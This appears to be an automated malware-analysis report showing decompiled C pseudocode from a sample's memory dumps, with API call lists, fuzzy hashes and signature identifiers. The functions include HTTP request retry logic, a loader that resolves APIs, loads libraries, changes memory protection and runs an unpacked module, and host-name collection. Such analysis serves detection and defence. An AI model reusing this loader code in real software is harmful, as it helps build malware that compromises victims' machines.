				long _v8;
				long _v12;
				char _v16;
				void* _t14;
				long _t15;
				char* _t17;
				intOrPtr* _t19;
				signed int _t22;

				_t19 = __imp__; // 0x6fa7e700
				_t22 =  ~_a8;
				_v12 = 0;
				asm("sbb esi, esi");
				while(1) {
					_v8 = 0;
					_t14 =  *_t19(_a4, _a8, _t22, 0, 0, 0, 0); // executed
					if(_t14 != 0) {
						break;
					}
					_t15 = GetLastError();
					_v8 = _t15;
					if(_t15 != 0x2f8f) {
						if(_t15 == 0x2f00) {
							continue;
						}
					} else {
						_v16 = 0x3300;
						if(_v12 == 0) {
							_t17 =  &_v16;
							__imp__(_a4, 0x1f, _t17, 4);
							if(_t17 == 0) {
								_v8 = GetLastError();
							} else {
								_v12 = 1;
								continue;
							}
						}
					}
					L9:
					return _v8;
				}
				goto L9;
			}











                                                                                                                                  0x00a31f79
                                                                                                                                  0x00a31f86
                                                                                                                                  0x00a31f88
                                                                                                                                  0x00a31f8b
                                                                                                                                  0x00a31fd0
                                                                                                                                  0x00a31fd8
                                                                                                                                  0x00a31fde
                                                                                                                                  0x00a31fe2
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a31f8f
                                                                                                                                  0x00a31f95
                                                                                                                                  0x00a31f9d
                                                                                                                                  0x00a31fce
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a31f9f
                                                                                                                                  0x00a31f9f
                                                                                                                                  0x00a31fa9
                                                                                                                                  0x00a31fad
                                                                                                                                  0x00a31fb6
                                                                                                                                  0x00a31fbe
                                                                                                                                  0x00a31fec
                                                                                                                                  0x00a31fc0
                                                                                                                                  0x00a31fc0
                                                                                                                                  0x00000000
                                                                                                                                  0x00a31fc0
                                                                                                                                  0x00a31fbe
                                                                                                                                  0x00a31fa9
                                                                                                                                  0x00a31fef
                                                                                                                                  0x00a31ff6
                                                                                                                                  0x00a31ff6
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32 ref: 00A31F8F
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,00A346B9,00000000,?,?), ref: 00A31FE6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast
                                                                                                                                  • String ID: @MtNt
                                                                                                                                  • API String ID: 1452528299-3251738875
                                                                                                                                  • Opcode ID: 13e3a690d8ef70e8ef93f466c01b18b0d2e3e5650bc85acf07ea81043de53138
                                                                                                                                  • Instruction ID: 9dbc4c02b3f1abf3a97dd96f025566982b5940789598695b25ae76f3d59d9674
                                                                                                                                  • Opcode Fuzzy Hash: 13e3a690d8ef70e8ef93f466c01b18b0d2e3e5650bc85acf07ea81043de53138
                                                                                                                                  • Instruction Fuzzy Hash: C4014C31904208FBDB10DFEADC48EAEBFB8EB85760F108067F901E2254D7708A45DB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A34AAB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 5memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A34AAB(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0xa3d270, 0, _a4); // executed
				return _t2;
			}




                                                                                                                                  0x00a34ab7
                                                                                                                                  0x00a34abd

                                                                                                                                  APIs
                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,00A35012,00000000,?,?,00000000), ref: 00A34AB7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeHeap
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 3298025750-8415677
                                                                                                                                  • Opcode ID: ac5ab1952c78a6228b75ee719aee2907923688bf954047713ea0bb57f302e48c
                                                                                                                                  • Instruction ID: 7832c9eec240268f1c83484c1f14c76d58234a07a3695f5b54a307a47e086f03
                                                                                                                                  • Opcode Fuzzy Hash: ac5ab1952c78a6228b75ee719aee2907923688bf954047713ea0bb57f302e48c
                                                                                                                                  • Instruction Fuzzy Hash: D1B012F5100100EBCE21CBD0EF04F06BA31B750700F004011B30410070C2318432FB15
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A3144D, Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 75%
                                                                                                                                  			E00A3144D(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E00A33DA0(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0xa3d2e0; // 0x296a5a8
						_t20 = _t68 + 0xa3e1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E00A347EB(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                                                                                                                                  0x00a31453
                                                                                                                                  0x00a31456
                                                                                                                                  0x00a31466
                                                                                                                                  0x00a3146f
                                                                                                                                  0x00a31473
                                                                                                                                  0x00a31541
                                                                                                                                  0x00a31547
                                                                                                                                  0x00a31547
                                                                                                                                  0x00a3148d
                                                                                                                                  0x00a31492
                                                                                                                                  0x00a31496
                                                                                                                                  0x00a3149c
                                                                                                                                  0x00a314a1
                                                                                                                                  0x00a314a8
                                                                                                                                  0x00a314b7
                                                                                                                                  0x00a314b7
                                                                                                                                  0x00a314bb
                                                                                                                                  0x00a314bd
                                                                                                                                  0x00a314c9
                                                                                                                                  0x00a314d4
                                                                                                                                  0x00a314df
                                                                                                                                  0x00a314e3
                                                                                                                                  0x00a314ed
                                                                                                                                  0x00a314f1
                                                                                                                                  0x00a314f3
                                                                                                                                  0x00a314f8
                                                                                                                                  0x00a314ff
                                                                                                                                  0x00a3150f
                                                                                                                                  0x00a3150f
                                                                                                                                  0x00a314f8
                                                                                                                                  0x00a314f1
                                                                                                                                  0x00a31511
                                                                                                                                  0x00a31516
                                                                                                                                  0x00a3151b
                                                                                                                                  0x00a3151b
                                                                                                                                  0x00a3151e
                                                                                                                                  0x00a31527
                                                                                                                                  0x00a3152c
                                                                                                                                  0x00a3152c
                                                                                                                                  0x00a31531
                                                                                                                                  0x00a31536
                                                                                                                                  0x00a31536
                                                                                                                                  0x00a31531
                                                                                                                                  0x00a314bb
                                                                                                                                  0x00a31538
                                                                                                                                  0x00a3153e
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00A33DA0: SysAllocString.OLEAUT32(80000002), ref: 00A33DFD
                                                                                                                                    • Part of subcall function 00A33DA0: SysFreeString.OLEAUT32(00000000), ref: 00A33E63
                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00A3152C
                                                                                                                                  • SysFreeString.OLEAUT32(00A328D9), ref: 00A31536
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$Free$Alloc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 986138563-0
                                                                                                                                  • Opcode ID: 6c984a347045985d6a21ffbb64b012b81988235f7f0db44ee3c37fd0a301e332
                                                                                                                                  • Instruction ID: 3a7e55bcde3cba80c6081097c2046c2f71f6239a8eeae4d6d81540a8c1ea33db
                                                                                                                                  • Opcode Fuzzy Hash: 6c984a347045985d6a21ffbb64b012b81988235f7f0db44ee3c37fd0a301e332
                                                                                                                                  • Instruction Fuzzy Hash: 39310776500119EFCB25DFA9CD88C9BBB79FBC9750B148698F8069B210E631ED51CBA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8D1015, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 70COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                  			E6E8D1015(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x6e8d41c0;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e8d41c0 - 0x69b24f45 &  !( *0x6e8d41c0 - 0x69b24f45);
				_t18 = E6E8D19C2( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e8d41c0 - 0x69b24f45 &  !( *0x6e8d41c0 - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e8d41c0 - 0x69b24f45 &  !( *0x6e8d41c0 - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E6E8D1798(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E6E8D1DE5(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E6E8D12B5(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E6E8D1397(_t42);
					L8:
					return _t29;
				}
			}














                                                                                                                                  0x6e8d101d
                                                                                                                                  0x6e8d101f
                                                                                                                                  0x6e8d103b
                                                                                                                                  0x6e8d104c
                                                                                                                                  0x6e8d1053
                                                                                                                                  0x6e8d10b1
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d1055
                                                                                                                                  0x6e8d1055
                                                                                                                                  0x6e8d105f
                                                                                                                                  0x6e8d1063
                                                                                                                                  0x6e8d1068
                                                                                                                                  0x6e8d106b
                                                                                                                                  0x6e8d1070
                                                                                                                                  0x6e8d1074
                                                                                                                                  0x6e8d1079
                                                                                                                                  0x6e8d107e
                                                                                                                                  0x6e8d1082
                                                                                                                                  0x6e8d1087
                                                                                                                                  0x6e8d1088
                                                                                                                                  0x6e8d108c
                                                                                                                                  0x6e8d1091
                                                                                                                                  0x6e8d1099
                                                                                                                                  0x6e8d1099
                                                                                                                                  0x6e8d1091
                                                                                                                                  0x6e8d1082
                                                                                                                                  0x6e8d1074
                                                                                                                                  0x6e8d109b
                                                                                                                                  0x6e8d10a4
                                                                                                                                  0x6e8d10a8
                                                                                                                                  0x6e8d10b2
                                                                                                                                  0x6e8d10b8
                                                                                                                                  0x6e8d10b8

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E8D19C2: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6E8D1051,?,?,?,?), ref: 6E8D19E6
                                                                                                                                    • Part of subcall function 6E8D19C2: GetProcAddress.KERNEL32(00000000,?), ref: 6E8D1A08
                                                                                                                                    • Part of subcall function 6E8D19C2: GetProcAddress.KERNEL32(00000000,?), ref: 6E8D1A1E
                                                                                                                                    • Part of subcall function 6E8D19C2: GetProcAddress.KERNEL32(00000000,?), ref: 6E8D1A34
                                                                                                                                    • Part of subcall function 6E8D19C2: GetProcAddress.KERNEL32(00000000,?), ref: 6E8D1A4A
                                                                                                                                    • Part of subcall function 6E8D19C2: GetProcAddress.KERNEL32(00000000,?), ref: 6E8D1A60
                                                                                                                                    • Part of subcall function 6E8D1798: memcpy.NTDLL(?,?,?,?,?,?,?,?,6E8D105F,?,?,?,?,?,?), ref: 6E8D17CF
                                                                                                                                    • Part of subcall function 6E8D1798: memcpy.NTDLL(?,?,?), ref: 6E8D1804
                                                                                                                                    • Part of subcall function 6E8D1DE5: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6E8D1E1D
                                                                                                                                    • Part of subcall function 6E8D12B5: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?), ref: 6E8D12EE
                                                                                                                                    • Part of subcall function 6E8D12B5: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E8D1363
                                                                                                                                    • Part of subcall function 6E8D12B5: GetLastError.KERNEL32 ref: 6E8D1369
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?), ref: 6E8D1093
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682224691.000000006E8D1000.00000020.00020000.sdmp, Offset: 6E8D0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.682210972.000000006E8D0000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682249539.000000006E8D3000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682273423.000000006E8D5000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682314087.000000006E8D6000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                                                                                                                                  • String ID: @Mt MtTt
                                                                                                                                  • API String ID: 2673762927-608512568
                                                                                                                                  • Opcode ID: 082aa56ea6a6b4b4841565d7e90b9c45b7c3b840ddde9d6688cb308e1ffb4015
                                                                                                                                  • Instruction ID: 4a23e53998390d601274106cac22ca2b73a6202ef6304d38509f13e0dcd325fe
                                                                                                                                  • Opcode Fuzzy Hash: 082aa56ea6a6b4b4841565d7e90b9c45b7c3b840ddde9d6688cb308e1ffb4015
                                                                                                                                  • Instruction Fuzzy Hash: 48110836700709ABC721BAE98C94DEF77BCAF893147040D29EA02A7644DFA1ED0D8790
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8D10B9, Relevance: 3.1, APIs: 2, Instructions: 59stringthreadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E6E8D10B9() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t36;
				intOrPtr _t39;

				_t15 =  *0x6e8d41c4;
				if( *0x6e8d41ac > 5) {
					_t16 = _t15 + 0x6e8d50f9;
				} else {
					_t16 = _t15 + 0x6e8d50b1;
				}
				E6E8D15A0(_t16, _t16);
				_t36 = 6;
				memset( &_v32, 0, _t36 << 2);
				if(E6E8D1EF0( &_v32,  &_v16,  *0x6e8d41c0 ^ 0xf7a71548) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x6e8d41b8);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E6E8D1172(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x6e8d41b8 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							E6E8D2070(_t44, _t32 + 4);
						}
					}
					_t25 = E6E8D1015(_v28); // executed
				}
				ExitThread(_t25);
			}















                                                                                                                                  0x6e8d10bf
                                                                                                                                  0x6e8d10d0
                                                                                                                                  0x6e8d10da
                                                                                                                                  0x6e8d10d2
                                                                                                                                  0x6e8d10d2
                                                                                                                                  0x6e8d10d2
                                                                                                                                  0x6e8d10e1
                                                                                                                                  0x6e8d10ea
                                                                                                                                  0x6e8d10ef
                                                                                                                                  0x6e8d110d
                                                                                                                                  0x6e8d1169
                                                                                                                                  0x6e8d110f
                                                                                                                                  0x6e8d1115
                                                                                                                                  0x6e8d111b
                                                                                                                                  0x6e8d1129
                                                                                                                                  0x6e8d112d
                                                                                                                                  0x6e8d1134
                                                                                                                                  0x6e8d113d
                                                                                                                                  0x6e8d1141
                                                                                                                                  0x6e8d1147
                                                                                                                                  0x6e8d1158
                                                                                                                                  0x6e8d1149
                                                                                                                                  0x6e8d114f
                                                                                                                                  0x6e8d114f
                                                                                                                                  0x6e8d1147
                                                                                                                                  0x6e8d1160
                                                                                                                                  0x6e8d1160
                                                                                                                                  0x6e8d116b

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682224691.000000006E8D1000.00000020.00020000.sdmp, Offset: 6E8D0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.682210972.000000006E8D0000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682249539.000000006E8D3000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682273423.000000006E8D5000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682314087.000000006E8D6000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExitThreadlstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2636182767-0
                                                                                                                                  • Opcode ID: 7cd5516a944fab9e57e25fa55bcac575c7453741c13f36ea95645ff5312a9a29
                                                                                                                                  • Instruction ID: 33862c08852204cfabe5ea0a4af1a65c1e5dab79df08f50a96fff0a889df82c8
                                                                                                                                  • Opcode Fuzzy Hash: 7cd5516a944fab9e57e25fa55bcac575c7453741c13f36ea95645ff5312a9a29
                                                                                                                                  • Instruction Fuzzy Hash: AF115872508609AFEF11DBE9C848A8777ECAF46304F014D26E559E7290EB30E94DCB92
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A34B28, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 43memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A34B28(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E00A363F5(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0xa3d270, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E00A31E47(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}








                                                                                                                                  0x00a34b28
                                                                                                                                  0x00a34b30
                                                                                                                                  0x00a34b47
                                                                                                                                  0x00a34b62
                                                                                                                                  0x00a34b66
                                                                                                                                  0x00a34b6b
                                                                                                                                  0x00a34b6d
                                                                                                                                  0x00a34b7f
                                                                                                                                  0x00a34b8b
                                                                                                                                  0x00a34b6f
                                                                                                                                  0x00a34b6f
                                                                                                                                  0x00a34b74
                                                                                                                                  0x00a34b79
                                                                                                                                  0x00a34b79
                                                                                                                                  0x00a34b6d
                                                                                                                                  0x00a34b91
                                                                                                                                  0x00a34b95
                                                                                                                                  0x00a34b95
                                                                                                                                  0x00a34b3c
                                                                                                                                  0x00a34b41
                                                                                                                                  0x00a34b45
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00A31E47: SysFreeString.OLEAUT32(00000000), ref: 00A31EAA
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74E5F710,?,00000000,?,00000000,?,00A3506B,?,004F0053,033A9370,00000000,?), ref: 00A34B8B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Free$HeapString
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 3806048269-8415677
                                                                                                                                  • Opcode ID: 30145e7bc2bc121482f12da8720703616f4b10e16950db56db84281804b2c874
                                                                                                                                  • Instruction ID: 0514c665371cbf9502ae634e11d240870c3dcc83df8311073f933c29012df619
                                                                                                                                  • Opcode Fuzzy Hash: 30145e7bc2bc121482f12da8720703616f4b10e16950db56db84281804b2c874
                                                                                                                                  • Instruction Fuzzy Hash: 1A011D72500659FBDF229F94CC02FEEBB65EF18790F048025FE099A120D731D960EB90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A31BBF, Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                  			E00A31BBF(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E00A375F6(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E00A34AAB(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                                                                                                                                  0x00a31bc4
                                                                                                                                  0x00a31bcf
                                                                                                                                  0x00a31bd1
                                                                                                                                  0x00a31bd7
                                                                                                                                  0x00a31bd9
                                                                                                                                  0x00a31bde
                                                                                                                                  0x00a31be7
                                                                                                                                  0x00a31beb
                                                                                                                                  0x00a31bf4
                                                                                                                                  0x00a31bf8
                                                                                                                                  0x00a31c07
                                                                                                                                  0x00a31bfa
                                                                                                                                  0x00a31bfb
                                                                                                                                  0x00a31c00
                                                                                                                                  0x00a31c00
                                                                                                                                  0x00a31bf8
                                                                                                                                  0x00a31beb
                                                                                                                                  0x00a31c10

                                                                                                                                  APIs
                                                                                                                                  • GetComputerNameExA.KERNELBASE(00000003,00000000,00A34531,74E5F710,00000000,?,?,00A34531), ref: 00A31BD7
                                                                                                                                    • Part of subcall function 00A375F6: RtlAllocateHeap.NTDLL(00000000,00000000,00A34F70), ref: 00A37602
                                                                                                                                  • GetComputerNameExA.KERNELBASE(00000003,00000000,00A34531,00A34532,?,?,00A34531), ref: 00A31BF4
                                                                                                                                    • Part of subcall function 00A34AAB: RtlFreeHeap.NTDLL(00000000,00000000,00A35012,00000000,?,?,00000000), ref: 00A34AB7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ComputerHeapName$AllocateFree
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 187446995-0
                                                                                                                                  • Opcode ID: f5e9e6bc6921f03411d36433badd917d4b876f7221528e9334418a5dd159bd3c
                                                                                                                                  • Instruction ID: 4393a1acc15e030002cdde40ebf7eaad67eb3f38c93430d34e7c82df8d0c36cc
                                                                                                                                  • Opcode Fuzzy Hash: f5e9e6bc6921f03411d36433badd917d4b876f7221528e9334418a5dd159bd3c
                                                                                                                                  • Instruction Fuzzy Hash: A7F0B43A640105BAEB10D7998E00FAF77FCDBC5755F100055F900D3140EA70DE028770
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A318D8, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0xa3d274) == 0) {
						E00A34450();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0xa3d274) == 1) {
						_t10 = E00A3262F(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}








                                                                                                                                  0x00a318df
                                                                                                                                  0x00a318e0
                                                                                                                                  0x00a318e3
                                                                                                                                  0x00a31915
                                                                                                                                  0x00a31917
                                                                                                                                  0x00a31917
                                                                                                                                  0x00a318e5
                                                                                                                                  0x00a318e6
                                                                                                                                  0x00a318fb
                                                                                                                                  0x00a31902
                                                                                                                                  0x00a31904
                                                                                                                                  0x00a31904
                                                                                                                                  0x00a31902
                                                                                                                                  0x00a318e6
                                                                                                                                  0x00a3191f

                                                                                                                                  APIs
                                                                                                                                  • InterlockedIncrement.KERNEL32(00A3D274), ref: 00A318ED
                                                                                                                                    • Part of subcall function 00A3262F: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,00A31900,?), ref: 00A32642
                                                                                                                                  • InterlockedDecrement.KERNEL32(00A3D274), ref: 00A3190D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
